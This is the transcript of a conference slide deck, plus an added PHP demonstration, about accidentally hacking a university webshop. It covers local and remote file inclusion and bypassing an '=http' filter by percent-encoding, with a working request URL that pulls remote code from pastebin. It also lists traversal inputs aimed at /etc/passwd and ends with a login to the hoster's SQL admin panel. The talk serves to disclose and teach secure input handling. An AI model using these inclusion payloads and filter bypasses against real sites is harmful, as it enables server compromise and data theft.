Oops! How I accidentally hacked the University's Merchandising Shop ● Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 1
About UniBwM ● University of the German Federal Armed Forces, Munich ● ~3700 students in 2011 ● Corporate Design ● Sells shirts and stuff via a student-driven webshop ● (image: UniBwM Press Archive) ● Slide 2
About Me ● Student of Computer Aided Engineering ● Assistant at the Network Security department ● Find them holes! ● www.danrl.de ● Slide 3
(image: static vs. dynamic pages) ● Slide 5
http://www.uni-fashion.de/index.php?inhalt=artikel.php&... ● Slide 6
A closer look ● That's a filename! ● http://www.uni-fashion.de/index.php?inhalt=artikel.php&... ● The filename in the query string is used to load the dynamic content. Unfortunately, that is a bad idea :( ● Slide 7
Behind the scenes ● (diagram: the Visitor requests index.php from the Webserver; index.php includes artikel.php) ● We call this technique File Inclusion (a local file here, hence Local File Inclusion) ● Slide 8
Escalating ● Let's try some other filenames ● /etc/passwd ● /var/log/messages ● /root/.bash_history ● Slide 9
No success! (that's good from the security point of view) ● Slide 10
Remote File Inclusion ● (diagram: the Attacker requests index.php from the Webserver; index.php includes evil.php from the attacker's Evil Webserver) ● Let's create some harmless code to include! ● Slide 11
Raw Code (screenshot) ● Slide 13
Fail! ● No success! (that's good from the security point of view) ● Slide 14
Difference makes a difference ● But wait... don't these error messages look different? What does that mean? ● (screenshots: Webserver Error vs. Website Error) ● Slide 15
Questions ● Why did the Remote File Inclusion attack fail? ● Why do local files produce different errors than remote files? ● (diagram: Request → “Filtering” by the Webserver's .htaccess “Rules” → index.php) ● Slide 16
No guts, no glory! ● =http is filtered ● Slide 17
Fail! ● =http is filtered ● Slide 18
Encoding issues ● In a URL every character can be written as %<HEX-ASCII> ● Same URL, different writing: ● http://uni-fashion.de/index.php?a=ab ● http://uni-fashion.de/index.php?a=%61%62 ● Will the filter catch this one? ● http://uni-fashion.de/index.php?inhalt=%68ttp://pastebin.com/raw.php?i=XqcNB6hz (the h written as %<HEX-ASCII>) ● Slide 19
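The mechanism behind slides 7 to 19, as an added example that is not the webshop's code (the slides never show the shop's PHP or its exact .htaccess rule): a dispatcher that includes whatever `?inhalt=` names, a blocklist filter that only looks at the raw query string, which is what an Apache `RewriteCond %{QUERY_STRING}` rule matches against, the percent-encoded request that walks past it, and the allowlist that makes such a filter unnecessary. The file names, the host `evil.example`, and the pattern `=http` as a regular expression are assumptions; the example also treats local paths as includable, which the slides report did not work on this host, for reasons they do not give.

```php
<?php
// Added example, not the uni-fashion.de code. Models the ?inhalt= dispatcher
// from the slides, the "=http" filter, its percent-encoding bypass, and the fix.
// File names, evil.example and the filter regex are assumptions.

// 1. Vulnerable dispatcher: the client-supplied value becomes the include path.
//    Local paths give LFI; with allow_url_include=On (PHP >= 5.2; before that
//    allow_url_fopen alone was enough) http:// URLs give RFI.
function resolve_vulnerable(string $inhalt): string
{
    return $inhalt;                         // index.php then does include($inhalt)
}

// 2. A blocklist filter in front of index.php. Apache's RewriteCond
//    %{QUERY_STRING} matches the raw query string, so this regex, like the
//    .htaccess rule, sees the bytes before any percent-decoding happens.
function filter_blocks(string $rawQuery): bool
{
    return preg_match('/=http/i', $rawQuery) === 1;
}

// 3. What the application receives: PHP builds $_GET by percent-decoding.
//    parse_str() applies the same decoding, so it reproduces $_GET['inhalt'].
function decoded_inhalt(string $rawQuery): ?string
{
    parse_str($rawQuery, $params);
    $value = $params['inhalt'] ?? null;
    return is_string($value) ? $value : null;
}

// 4. The fix: an allowlist of page files, compared strictly. Anything else is
//    rejected before include() ever sees it, encoded or not, local or remote.
function resolve_safe(string $inhalt): ?string
{
    $allowed = ['artikel.php', 'warenkorb.php', 'impressum.php'];   // assumed names
    return in_array($inhalt, $allowed, true) ? __DIR__ . '/' . $inhalt : null;
}

// Constructed sample requests: raw query strings as the webserver sees them.
$requests = [
    'inhalt=artikel.php',                      // the legitimate request (slide 6)
    'inhalt=../../../../etc/passwd',           // LFI attempt (slide 9)
    'inhalt=http://evil.example/evil.php',     // RFI, caught by the filter (slide 18)
    'inhalt=%68ttp://evil.example/evil.php',   // same RFI, h as %68 (slide 19)
    'inhalt=%2e%2e/%2e%2e/etc/passwd',         // traversal, fully percent-encoded
];

foreach ($requests as $raw) {
    $decoded = decoded_inhalt($raw) ?? '';
    printf(
        "%-40s filter: %-8s vulnerable include: %-32s allowlist: %s\n",
        $raw,
        filter_blocks($raw) ? 'blocked' : 'passed',
        resolve_vulnerable($decoded),
        resolve_safe($decoded) ?? 'REJECTED'
    );
}
```

Run it with `php example.php`. The third line shows the filter catching the plain URL; the fourth shows `%68ttp://` passing the filter while the value handed to include() is byte-for-byte the one that was just blocked. Matching after decoding would close that particular hole, but the allowlist removes the whole class of bad values, which is what "repair your code instead of filtering" on the lessons slide amounts to.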
Bazinga! ● Slide 20
Can you keep a secret? ● New code ● New URL ● Same game ● WTF? ● Slide 21
A few no-brainers ● Look up the hoster in WHOIS ● Find the URL of the hoster's SQL admin panel ● Log in with the correct password :) ● Slide 22
My work here is done... ● Might be useful :) ● Slide 24
Lessons learned ● Always validate every piece of user-supplied input! ● Seriously, do it! ● Do not patch bad code with filters; repair the code instead! ● Never trust the encoding of what you receive! ● Use SSL for your SQL admin panel :) ● I can haz a free T-Shirt now? ● Slide 25
Thanks! Questions? ● Slide 26